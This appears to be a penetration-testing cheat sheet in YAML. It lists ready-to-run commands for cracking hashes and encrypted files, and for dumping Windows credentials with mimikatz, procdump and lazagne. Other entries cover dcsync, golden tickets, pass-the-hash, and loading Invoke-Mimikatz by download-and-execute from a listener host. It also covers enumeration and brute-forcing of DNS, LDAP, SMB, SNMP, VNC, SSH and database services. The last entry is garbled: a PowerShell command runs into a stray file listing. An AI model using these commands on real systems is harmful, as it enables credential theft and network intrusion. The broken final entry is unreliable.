lang: sh
|
||
tags: bruteforce, crack, files
|
||
desc: PDF - pdfcrack
|
||
- cmd: qpdf --password=<PASSWORD> --decrypt <encrypted_pdf>.pdf <plaintext_pdf>.pdf
|
||
lang: sh
|
||
tags: bruteforce, crack, files
|
||
desc: PDF decrypt - qpdf
|
||
- cmd: keepass2john <file>.kdbx > out.kbdx.hashes && john --wordlist <wordlist> out.kbdx.hashes
|
||
lang: sh
|
||
tags: bruteforce, crack, files
|
||
desc: keepass kdbx - john
|
||
- cmd: python3 <path_to_john>/run/office2john.py <file>.xls > out.hash && john --wordlist <wordlist> out.hash
|
||
lang: sh
|
||
tags: bruteforce, crack, files
|
||
desc: XLS PPT DOC - john
|
||
- cmd: hashcat -a 0 -m 400 hashes <wordlist>
|
||
lang: sh
|
||
tags: password recovery, password cracking
|
||
desc: hashcat - basic md5 (joomla/wordpress) - wordlist
|
||
- cmd: hashcat -a 0 -m 400 hashes <wordlist> -r /usr/share/doc/hashcat/rules/best64.rule
|
||
lang: sh
|
||
tags: password recovery, password cracking
|
||
desc: hashcat - basic md5 (joomla/wordpress) - wordlist with rules
|
||
- cmd: hashcat -m 13100 --force -a 0 hashes <wordlist>
|
||
lang: sh
|
||
tags: password recovery, password cracking
|
||
desc: hashcat - kerberos ticket (after kerberoasting)
|
||
- cmd: hashcat -m 3000 -a 0 hashes <wordlist>
|
||
lang: sh
|
||
tags: password recovery, password cracking
|
||
desc: hashcat - LM
|
||
- cmd: hashcat -m 1000 -a 0 hashes <wordlist>
|
||
lang: sh
|
||
tags: password recovery, password cracking
|
||
desc: hashcat - NTLM
|
||
- cmd: hashcat -m 5500 -a 0 hashes <wordlist>
|
||
lang: sh
|
||
tags: password recovery, password cracking
|
||
desc: hashcat - NTLMv1
|
||
- cmd: hashcat -m 5600 -a 0 hashes <wordlist>
|
||
lang: sh
|
||
tags: password recovery, password cracking
|
||
desc: hashcat - NTLMv2
|
||
- cmd: hashcat -m 5600 --force -a 1 hashes <custom_wordlist> <custom_wordlist>
|
||
lang: sh
|
||
tags: password recovery, password cracking
|
||
desc: hashcat - NTLMv2 - Combination attack (ex:passpass,testtest,passtest,etc)
|
||
- cmd: cat keywords.txt | hashcat -r <rule_file> --stdout > ./<custom_wordlist>
|
||
lang: sh
|
||
tags: password recovery, password cracking
|
||
desc: hashcat - generate wordlist using rules
|
||
- cmd: john --wordlist=<wordlist> --format=lm hash.txt
|
||
lang: sh
|
||
tags: password recovery, password cracking
|
||
desc: john LM
|
||
- cmd: john --wordlist=<wordlist> --format=nt hash.txt
|
||
lang: sh
|
||
tags: password recovery, password cracking
|
||
desc: john NTLM
|
||
- cmd: john --wordlist=<wordlist> --format=netntlm hash.txt
|
||
lang: sh
|
||
tags: password recovery, password cracking
|
||
desc: john NTLMv1
|
||
- cmd: john --wordlist=<wordlist> --format=netntlmv2 hash.txt
|
||
lang: sh
|
||
tags: password recovery, password cracking
|
||
desc: john NTLMv2
|
||
- cmd: python /usr/share/john/ssh2john.py <ssh_key> > <ssh_hash|sshkey.hash>
|
||
lang: sh
|
||
tags: password recovery, password cracking
|
||
desc: john ssh convert key
|
||
- cmd: john --wordlist=<wordlist> <ssh_hash|sshkey.hash>
|
||
lang: sh
|
||
tags: password recovery, password cracking
|
||
desc: john ssh
|
||
- cmd: lazagne.exe all
|
||
lang: sh
|
||
tags: lazagne, dump password
|
||
desc: lazagne dump all passwords (trig av)
|
||
- cmd: mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
|
||
lang: sh
|
||
tags: mimikatz, passwords
|
||
desc: mimikatz onliner
|
||
- cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/Invoke-Mimikatz.ps1') | IEX; Invoke mimikatz
|
||
lang: ps1
|
||
tags: mimikatz, passwords
|
||
desc: powershell - load mimikatz
|
||
- cmd: mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"
|
||
lang: sh
|
||
tags: mimikatz, passwords
|
||
desc: mimikatz disable PPL and dump passwords
|
||
- cmd: mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:<domain> /user:<user>" "exit"
|
||
lang: sh
|
||
tags: mimikatz, passwords
|
||
desc: mimikatz dcsync - user (krbtgt/Administrator)
|
||
- cmd: mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"
|
||
lang: sh
|
||
tags: mimikatz, passwords
|
||
desc: mimikatz extract credentials from dump
|
||
- cmd: mimikatz.exe "lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM"
|
||
lang: sh
|
||
tags: mimikatz, passwords
|
||
desc: mimikatz extract credentials from shadow copy (1)
|
||
- cmd: mimikatz.exe "lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY"
|
||
lang: sh
|
||
tags: mimikatz, passwords
|
||
desc: mimikatz extract credentials from shadow copy (2)
|
||
- cmd: powershell.exe "[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM', '.\Desktop\SYSTEM.bkp'); [System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY', '.\Desktop\SECURITY.bkp'); [System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM', '.\Desktop\SAM.bkp')"
|
||
lang: sh
|
||
tags: mimikatz, passwords
|
||
desc: extract on hand shadow volume copy
|
||
- cmd: sekurlsa::tickets /export
|
||
lang: sh
|
||
tags: mimikatz, passwords
|
||
desc: mimikatz extract tickets
|
||
- cmd: kerberos::golden /user:<user> /domain:<domain> /sid:<child_sid> /krbtgt:<krbtgt_ntlm> /sids:<parent_sid>-519 /ptt
|
||
lang: ps1
|
||
tags: mimikatz, passwords
|
||
desc: mimikatz - forest extra SID
|
||
- cmd: sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm_hash> /run:"mstsc.exe /restrictedadmin"
|
||
lang: sh
|
||
tags: mimikatz, passwords
|
||
desc: mimikatz pth to RDP mstsc.exe
|
||
- cmd: sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm_hash> /run:powershell
|
||
lang: sh
|
||
tags: mimikatz, passwords
|
||
desc: mimikatz pth run powershell remotelly
|
||
- cmd: C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
|
||
lang: ps1
|
||
tags: procdump, lsass, credentials
|
||
desc: procdump - dump lsass - local
|
||
- cmd: 'net use Z: https://live.sysinternals.com; Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp'
|
||
lang: ps1
|
||
tags: procdump, lsass, credentials
|
||
desc: procdump - dump lsass - remote
|
||
- cmd: host -t ns <domain>
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: host find name server
|
||
- cmd: host -t mx <domain>
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: host find mail server
|
||
- cmd: dig <domain_name> @1.1.1.1
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: dig dns lookup
|
||
- cmd: dig ANY <domain_name> @<dns_ip>
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: dig any information
|
||
- cmd: dig -x <ip> @<dns_ip>
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: dig reverse lookup
|
||
- cmd: dig axfr <domain_name> @<name_server>
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: dig zone transfer
|
||
- cmd: dig +short <domain_name> @resolver1.opendns.com
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: dig, find external, public IP address
|
||
- cmd: dig -f <domains.txt> +noall +answer
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: dig, find domains file ip address value
|
||
- cmd: dig -f <domains.txt> MX +noall +answer
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: dig, find domains file MX ip record
|
||
- cmd: dnsrecon -d <domain>
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: dnsrecon standard enum on domain
|
||
- cmd: dnsrecon -d <domain> -t axfr
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: dnsrecon zone transfer
|
||
- cmd: dnsrecon -r <startip>-<endip> -n <domain_name_server>
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: dnsrecon reverse lookup start/end ip
|
||
- cmd: dnsrecon -r <ip_with_network_mask> -n <domain_name_server>
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: dnsrecon reverse lookup network range ip
|
||
- cmd: dnsrecon -d <domain> -D <wordlist> -t brt; dnsenum <domain>
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: dnsrecon domain bruteforce
|
||
- cmd: nmap -sV -p 53 --script dns-nsid <ip>
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: nmap grab banner
|
||
- cmd: nmap -n -sV --script "(*dns* and (default or (discovery and safe))) or dns-random-txid or dns-random-srcport" -p 53 <ip>
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: nmap dns tcp
|
||
- cmd: nmap -n -sV -sU --script "(*dns* and (default or (discovery and safe))) or dns-random-txid or dns-random-srcport" -p 53 <ip>
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: nmap dns udp
|
||
- cmd: nmap --script dns-srv-enum --script-args dns-srv-enum.domain='<domain>'
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: nmap activedirectory enum
|
||
- cmd: nmap -sSU -p53 --script dns-nsec-enum --script-args dns-nsec-enum.domains=<domain> <ip>
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: nmap dnssec
|
||
- cmd: msfconsole -x "use auxiliary/gather/enum_dns; set domain <domain>; set ns <dns_server>; exploit"
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: dns metasploit enumeration
|
||
- cmd: sublist3r -d <domain> -v
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: dns sublist3r - subdomain enumeration
|
||
- cmd: sublist3r -b -d <domain>
|
||
lang: sh
|
||
tags: dns, host, 53
|
||
desc: dns sublist3r - subdomain enumeration with bruteforce module enabled
|
||
- cmd: wget -m ftp://anonymous:anonymous@<ip>
|
||
lang: sh
|
||
tags: ftp, 21
|
||
desc: ftp - download all
|
||
- cmd: wget -m --no-passive ftp://anonymous:anonymous@<ip>
|
||
lang: sh
|
||
tags: ftp, 21
|
||
desc: ftp download all (2)
|
||
- cmd: ftp <ip>
|
||
lang: sh
|
||
tags: ftp, 21
|
||
desc: ftp - connect
|
||
- cmd: ftp <ip> <port>
|
||
lang: sh
|
||
tags: ftp, 21
|
||
desc: ftp - connect port
|
||
- cmd: nmap -v -p 21 --script=ftp-anon.nse <ip>
|
||
lang: sh
|
||
tags: ftp, 21
|
||
desc: ftp - enum anonym
|
||
- cmd: msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS <ip>; set USER_FILE <user_file>; set PASS_FILE <password_file>; exploit"
|
||
lang: sh
|
||
tags: ftp, 21
|
||
desc: ftp - msf bruteforce login
|
||
- cmd: nmap -n -sV --script "ldap* and not brute" -p 389 <ip>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: ldap nmap
|
||
- cmd: ldapsearch -x -H ldap://<dc_fqdn> -s base
|
||
lang: sh
|
||
tags: pentest
|
||
desc: ldapsearch base
|
||
- cmd: ldapsearch -Y GSSAPI -H ldap://<dc_fqdn> -D "<user>" -W -b "dc=<domain>,dc=<path>" "servicePrincipalName=*" servicePrincipalName
|
||
lang: sh
|
||
tags: pentest
|
||
desc: ldapsearch SPN
|
||
- cmd: ldapsearch -x -H ldap://<dc_fqdn> -b <basedn>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: ldapsearch with base dn
|
||
- cmd: ldapsearch -x -H ldap://<dc_fqdn> -D <domain>\\<username> -w '<password>' -b 'DC=<domain>,DC=<path>'
|
||
lang: sh
|
||
tags: pentest
|
||
desc: ldapsearch base with authentication
|
||
- cmd: ldapsearch -x -H ldap://<dc_fqdn> -D <domain>\\<username> -w '<password>' -b 'DC=<domain>,DC=<path>' '(&(objectCategory=person)(objectClass=user))'
|
||
lang: sh
|
||
tags: pentest
|
||
desc: ldapsearch - list all users
|
||
- cmd: ldapsearch -x -H ldap://<dc_fqdn> -D <domain>\\<username> -w '<password>' -b 'DC=<domain>,DC=<path>' '(&(objectCategory=user)(adminCount=1))'
|
||
lang: sh
|
||
tags: pentest
|
||
desc: ldapsearch - list all users protected by adminCount
|
||
- cmd: ldapsearch -x -H ldap://<dc_fqdn> -D <domain>\\<username> -w '<password>' -b 'DC=<domain>,DC=<path>' '(&(objectCategory=user)(|(description=*pass*)(description=*password*)(description=*identifiant*)(description=*pwd*)))'
|
||
lang: sh
|
||
tags: pentest
|
||
desc: ldapsearch - list all users with password, pass, identifiant or pwd in their description
|
||
- cmd: ldapsearch -x -H ldap://<dc_fqdn> -D <domain>\\<username> -w '<password>' -b 'DC=<domain>,DC=<path>' '(ms-Mcs-AdmPwdExpirationtime=*)' ms-Mcs-AdmPwd
|
||
lang: sh
|
||
tags: pentest
|
||
desc: ldapsearch - list all computer with laps enabled and corresponding laps password if able
|
||
- cmd: ldapdomaindump --no-json --no-grep --authtype SIMPLE -o ldap_dump -r <ip> -u <domain>\\<username> -p '<password>'
|
||
lang: sh
|
||
tags: pentest
|
||
desc: ldapdomaindump
|
||
- cmd: ldapsearch-ad.py --server '<dc_fqdn>' -d <domain> -u <username> -p <password> --type pass-pols
|
||
lang: sh
|
||
tags: pentest
|
||
desc: ldapsearch-ad - list all password policies including FGPP
|
||
- cmd: ldapsearch-ad.py --server '<dc_fqdn>' -d <domain> -u <username> -p <password> -t search -s '(samaccountname=<groupname>)' cn msDS-PSOApplied
|
||
lang: sh
|
||
tags: pentest
|
||
desc: ldapsearch-ad - get the FGPP applied to a group
|
||
- cmd: ldapsearch-ad.py --server '<dc_fqdn>' -d <domain> -u <username> -p <password> --type show-user -s '(samaccountname=<username>)'
|
||
lang: sh
|
||
tags: pentest
|
||
desc: ldapsearch-ad - get the FGPP applied to a user
|
||
- cmd: sqsh -S <ip> -U <user>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: '- connect'
|
||
- cmd: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <ip>
|
||
lang: sh
|
||
tags: mssql, Microsoft SQL Server, 1433
|
||
desc: mssql - enum
|
||
- cmd: msfconsole -x "use admin/mssql/mssql_enum_sql_logins; set RHOSTS <ip>; set USER_FILE <user_file>; set PASS_FILE <pass_file>; run"
|
||
lang: sh
|
||
tags: mssql, Microsoft SQL Server, 1433
|
||
desc: mssql - enum sql login
|
||
- cmd: msfconsole -x "use auxiliary/admin/mssql/mssql_enum; set RHOST <ip>; set password <password>; run"
|
||
lang: sh
|
||
tags: mssql, Microsoft SQL Server, 1433
|
||
desc: mssql - enum configuration setting (xp-cmdshell)
|
||
- cmd: msfconsole -x "use exploit/windows/mssql/mssql_linkcrawler"
|
||
lang: sh
|
||
tags: mssql, Microsoft SQL Server, 1433
|
||
desc: mssql link crawler
|
||
- cmd: mysql -u <user> -p<password> -h <hostname> <database>
|
||
lang: sh
|
||
tags: mysql, database, db, 3306
|
||
desc: connect
|
||
- cmd: mysql -u <user> -p -e "create database <database> character set UTF8mb4 collate utf8mb4_bin"
|
||
lang: sh
|
||
tags: mysql, database, db, 3306
|
||
desc: Create database
|
||
- cmd: mysqldump -u <user> -p <database> > <path>
|
||
lang: sh
|
||
tags: mysql, database, db, 3306
|
||
desc: Export database
|
||
- cmd: mysql -u <user> -p <database> <path>
|
||
lang: sh
|
||
tags: mysql, database, db, 3306
|
||
desc: Import database
|
||
- cmd: nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <ip>
|
||
lang: sh
|
||
tags: mysql, database, db, 3306
|
||
desc: nmap - mysql enumeration
|
||
- cmd: nbtscan -r <ip_range>
|
||
lang: sh
|
||
tags: netbios, scan, nbtscan
|
||
desc: nbtscan - netbios scan
|
||
- cmd: showmount -e <ip>
|
||
lang: sh
|
||
tags: nfs, showmount, 2049
|
||
desc: nfs showmount
|
||
- cmd: nmap -sV --script=nfs-showmount <ip>
|
||
lang: sh
|
||
tags: nfs, showmount, 2049
|
||
desc: nfs - nmap showmount
|
||
- cmd: mount -t nfs <ip>:<shared_folder> <mount_point> -o nolock
|
||
lang: sh
|
||
tags: nfs, showmount, 2049
|
||
desc: nfs - mount
|
||
- cmd: mount -t nfs -o vers=2 <ip>:<shared_folder> <mount_point> -o nolock
|
||
lang: sh
|
||
tags: nfs, showmount, 2049
|
||
desc: nfs - mount with v2 (no authenrt=)
|
||
- cmd: nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port <port> <ip>
|
||
lang: sh
|
||
tags: pop, pop3, 110, 995
|
||
desc: nmap - pop3 infos
|
||
- cmd: psql -h <host> -U <user>
|
||
lang: sh
|
||
tags: postgres, 5432, 5433
|
||
desc: postgres - connect
|
||
- cmd: psql -h <ip> -U <user> -d <database>
|
||
lang: sh
|
||
tags: postgres, 5432, 5433
|
||
desc: postgres - connect database
|
||
- cmd: psql -h <ip> -p <port> -U <user> -W <password> <database>
|
||
lang: sh
|
||
tags: postgres, 5432, 5433
|
||
desc: postgres - connect full options
|
||
- cmd: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||
lang: sh
|
||
tags: rdp, windows, 3389
|
||
desc: enable RDP
|
||
- cmd: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
|
||
lang: sh
|
||
tags: rdp, windows, 3389
|
||
desc: enable restricted admin
|
||
- cmd: Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin
|
||
lang: sh
|
||
tags: rdp, windows, 3389
|
||
desc: disable restricted admin
|
||
- cmd: sharprdp.exe computername=<computer> command="<command>" username=<domain>\<user> password=<password>
|
||
lang: sh
|
||
tags: rdp, windows, 3389
|
||
desc: rdp from console
|
||
- cmd: netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=tcp
|
||
lang: sh
|
||
tags: rdp, windows, 3389
|
||
desc: Add firewall authorisation RDP
|
||
- cmd: rdesktop -g 90% <ip> -u <user> -p <password> -d <domain>
|
||
lang: sh
|
||
tags: rdp, windows
|
||
desc: rdesktop - classic
|
||
- cmd: rdesktop -g 90% <ip> -u <user> -p <password> -d <domain> -r disk:share=<share>
|
||
lang: sh
|
||
tags: rdp, windows
|
||
desc: rdesktop - with share
|
||
- cmd: xfreerdp /u:<user> /p:<password> /d:<domain> /v:<ip> /size:1800x924
|
||
lang: sh
|
||
tags: rdp, windows
|
||
desc: xfreerdp - classic
|
||
- cmd: xfreerdp /u:<user> /p:<password> /d:<domain> /v:<ip> /size:1800x924 /drive:share,<share>
|
||
lang: sh
|
||
tags: rdp, windows
|
||
desc: xfreerdp - with share
|
||
- cmd: xfreerdp /u:<user> /pth:<hash> /d:<domain> /v:<ip>
|
||
lang: sh
|
||
tags: rdp, windows
|
||
desc: xfreerdp - pass the hash
|
||
- cmd: enum4linux -a <ip>
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: enum4linux - all except dictionary based share name listing (default)
|
||
- cmd: enum4linux -v <ip>
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: enum4linux - verbose
|
||
- cmd: enum4linux -u "" -p "" <ip>
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: enum4linux - null access
|
||
- cmd: enum4linux -u "guest" -p "" <ip>
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: enum4linux - guest access
|
||
- cmd: enum4linux -u <user> -p <password> <ip>
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: enum4linux - with authentication
|
||
- cmd: enum4linux -U <ip> |grep 'user:'
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: enum4linux - list Users
|
||
- cmd: nbtscan -r <ip_range>
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: nbtscan - scan network looking for hosts
|
||
- cmd: smbclient \\\\<ip>\\<share> -U "<user>%<password>"
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: smbclient with username and password
|
||
- cmd: smbclient \\\\<ip>\\<share> -U "<user>%"
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: smbclient sessions without password
|
||
- cmd: smbclient \\\\<ip>\\<share> -U "%"
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: smbclient null session
|
||
- cmd: nmap -Pn -sS -T4 --open --script smb-security-mode -p445 <ip>
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: smb - find not signed smb
|
||
- cmd: mount -t cifs //<ip>/C\$ /tmp/mnttarget/ -o username=<user> -o domain=<domain>
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: smb mount folder
|
||
- cmd: smbmap -H <ip> -u "<user>%<password>"
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: smbmap
|
||
- cmd: smbmap -u "" -p "" -P 445 -H <ip>
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: smbmap - null access
|
||
- cmd: smbmap -u "guest" -p "" -P 445 -H <ip>
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: smbmap - guest access
|
||
- cmd: smbmap -H <ip> -u <user> -p <password> -d <domain> -r
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: smbmap - list root of all shares
|
||
- cmd: smbmap -H <ip> -u <user> -p <password> -d <domain> -R <path> --depth 1
|
||
lang: sh
|
||
tags: smb, samba
|
||
desc: smbmap - recursively list dirs, and files
|
||
- cmd: nmap -p25 --script smtp-commands <ip>
|
||
lang: sh
|
||
tags: smtp, 25
|
||
desc: smtp nmap enumeration
|
||
- cmd: nmap -p25 --script smtp-ntlm-info <ip>
|
||
lang: sh
|
||
tags: smtp, 25
|
||
desc: smtp nmap ntlm information disclosure
|
||
- cmd: nmap –script smtp-enum-users.nse <ip>
|
||
lang: sh
|
||
tags: smtp, 25
|
||
desc: nmap - smtp user enum
|
||
- cmd: smtp-user-enum -M VRFY -U <userlist> -t <ip>
|
||
lang: sh
|
||
tags: smtp, 25
|
||
desc: smtp user enum
|
||
- cmd: msfconsole -x "use auxiliary/scanner/smtp/smtp_enum; set RHOSTS <ip>; exploit"
|
||
lang: sh
|
||
tags: smtp, 25
|
||
desc: msf - smtp user enum
|
||
- cmd: nmap -sU --open -p 161 -sC -sV <ip>
|
||
lang: sh
|
||
tags: snmp, 161
|
||
desc: nmap, snmp scan
|
||
- cmd: nmap -sU --open -p 161 --script=snmp-brute <ip> --script-args snmp-brute.communitiesdb=<snmp_community_strings_file>
|
||
lang: sh
|
||
tags: snmp, 161
|
||
desc: nmap, snmp brute
|
||
- cmd: echo public > community; echo private >> community; echo manager >> community; onesixtyone -c community -i ips; rm community
|
||
lang: sh
|
||
tags: snmp, 161
|
||
desc: onesixtyone
|
||
- cmd: snmpwalk -c public -v1 <ip>
|
||
lang: sh
|
||
tags: snmp, 161
|
||
desc: snmpwalk entire tree
|
||
- cmd: snmpwalk -c private -v1 <ip> 1.3.6.1.2.1.25.4.2.1.2
|
||
lang: sh
|
||
tags: snmp, 161
|
||
desc: snmpwalk - list running processes
|
||
- cmd: snmp-check -t <ip> -c public -p 162
|
||
lang: sh
|
||
tags: snmp, 161
|
||
desc: snmp-check - check snmp service on specified port (default:162)
|
||
- cmd: eval "$(ssh-agent -s)"; ssh-add
|
||
lang: sh
|
||
tags: ssh, 22
|
||
desc: Start ssh agent
|
||
- cmd: ssh -L <local_port>:<remote_host>:<remote_port> <user>@<ip>
|
||
lang: sh
|
||
tags: ssh, 22
|
||
desc: SSH local port forwarding (get remote_port on local)
|
||
- cmd: ssh -R <remote_binding>:<remote_port>:<local_host>:<local_port> <user>@<ip>
|
||
lang: sh
|
||
tags: ssh, 22
|
||
desc: SSH remote port forwarding (send local port to remote) (need GatewayPorts yes)
|
||
- cmd: ssh -D <socks_port> <user>@<ip>
|
||
lang: sh
|
||
tags: ssh, 22
|
||
desc: SSH proxysocks
|
||
- cmd: ssh-keyscan -t rsa <IP> -p <PORT>
|
||
lang: sh
|
||
tags: ssh, 22
|
||
desc: get public ssh key of server
|
||
- cmd: msfconsole -x "use scanner/ssh/ssh_enumusers; set RHOSTS <ip>; set USER_FILE <user_file>; set CHECK_FALSE true; exploit"
|
||
lang: sh
|
||
tags: ssh, 22
|
||
desc: msf - bruteforce username
|
||
- cmd: ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 <user>@<ip>
|
||
lang: sh
|
||
tags: ssh, 22
|
||
desc: SSH - old algorithm
|
||
- cmd: nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <ip>
|
||
lang: sh
|
||
tags: telnet, 23
|
||
desc: nmap - telnet
|
||
- cmd: nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p <port> <ip>
|
||
lang: sh
|
||
tags: vnc, 5800, 5801, 5900, 5901
|
||
desc: vnc - nmap enum
|
||
- cmd: vncviewer <ip>::<port>
|
||
lang: sh
|
||
tags: vnc, 5800, 5801, 5900, 5901
|
||
desc: vncviewer - connect to vnc no pass
|
||
- cmd: vncviewer -password <password.txt> <ip>::<port>
|
||
lang: sh
|
||
tags: vnc, 5800, 5801, 5900, 5901
|
||
desc: vncviewer - connect to vnc with password
|
||
- cmd: msfconsole -x "use auxiliary/scanner/vnc/vnc_none_auth; set RHOSTS <ip>; set RPORT <port>; run"
|
||
lang: sh
|
||
tags: vnc, 5800, 5801, 5900, 5901
|
||
desc: vnc msf test none auth
|
||
- cmd: msfconsole -x "use auxiliary/scanner/vnc/vnc_login; set RHOSTS <ip>; set RPORT <port>; set USERNAME <username>; run"
|
||
lang: sh
|
||
tags: vnc, 5800, 5801, 5900, 5901
|
||
desc: vnc - msf test login bf
|
||
- cmd: msfconsole -x "use auxiliary/scanner/vnc/vnc_login; set RHOSTS <ip>; set RPORT <port>; set USER_FILE <users_file>; set PASS_FILE <pass_file>; run"
|
||
lang: sh
|
||
tags: vnc, 5800, 5801, 5900, 5901
|
||
desc: vnc - msf test login bf (2)
|
||
- cmd: msfconsole -x "use post/windows/gather/credentials/vnc; set SESSION <session>; run"
|
||
lang: sh
|
||
tags: vnc, 5800, 5801, 5900, 5901
|
||
desc: vnc - post exploit retrieve credentials
|
||
- cmd: Enable-PSRemoting -Force ; Set-Item wsman:\localhost\client\trustedhosts 7z 7z.md Android-Debug-Bridge-adb Android-Debug-Bridge-adb.md apktool apktool.md application-whitelisting application-whitelisting.md Arsenal Arsenal.md AWS AWS.md binwalk binwalk.md Bitadmins.md bloodhound bloodhound.md bof bof.md Brew Brew.md Builds-recreates-starts-and-attaches-to-containers-for-all-services.md Builds-recreates-starts-and-attaches-to-containers-for-a-service.md Builds-recreates-starts-and-detaches-to-containers-for-all-services.md Builds-recreates-starts-and-detaches-to-containers-for-a-service.md C certipy certipy.md certutil certutil.md cewl cewl.md chisel chisel.md C.md cme cme.md coercer coercer.md commands.yaml Compile-windows-PE-32 Compile-windows-PE-32.md connect-to-mysql-docker-container.md Crack-files Crack-files.md Create-a-new-bash-process-inside-the-container-and-connect-it-to-the-terminal.md Create-new-network.md Crontab Crontab.md crunch crunch.md cve-bin-tool cve-bin-tool.md Delete-all-running-and-stopped-containers.md Dirb Dirb.md DNS DNS.md Docker Docker.md dotnet-.net dotnet-.net.md drupwn drupwn.md enum4linux enum4linux.md eyewitness eyewitness.md feroxbuster feroxbuster.md ffuf ffuf.md flashrom flashrom.md FTP FTP.md git git.md gobuster gobuster.md gowitness gowitness.md gpg gpg.md grep grep-hash grep-hash.md grep.md gzip gzip.md hashcat hashcat.md Hydra Hydra.md impacket Impacket impacket.md Impacket.md Jadx Jadx.md Java.md john-the-ripper john-the-ripper.md json json.md JwtTool JwtTool.md kerberos kerberos.md keytool keytool.md kubernetes kubernetes.md LAPS LAPS.md Lazagne Lazagne.md ldap ldap.md linux linux-bash linux-bash.md linux.md List-the-networks.md List-the-running-containers.md Lsassy Lsassy.md mimikatz mimikatz.md mitm6 mitm6.md MSF MSF.md msfvenom msfvenom-create-user msfvenom-create-user.md msfvenom-Handler msfvenom-Handler.md msfvenom.md msfvenom-Shellcode msfvenom-Shellcode.md msssql msssql.md Mysql Mysql.md ncat ncat.md netbios netbios.md netcat netcat.md network network.md nfs nfs.md nikto nikto.md nmap nmap.md nodejs nodejs.md npm npm.md nvm nvm.md Objection Objection.md openssl openssl.md Others-grep Others-grep.md parse.sh php-grep php-grep.md pop pop.md Postgres Postgres.md powershell powershell.md powerview 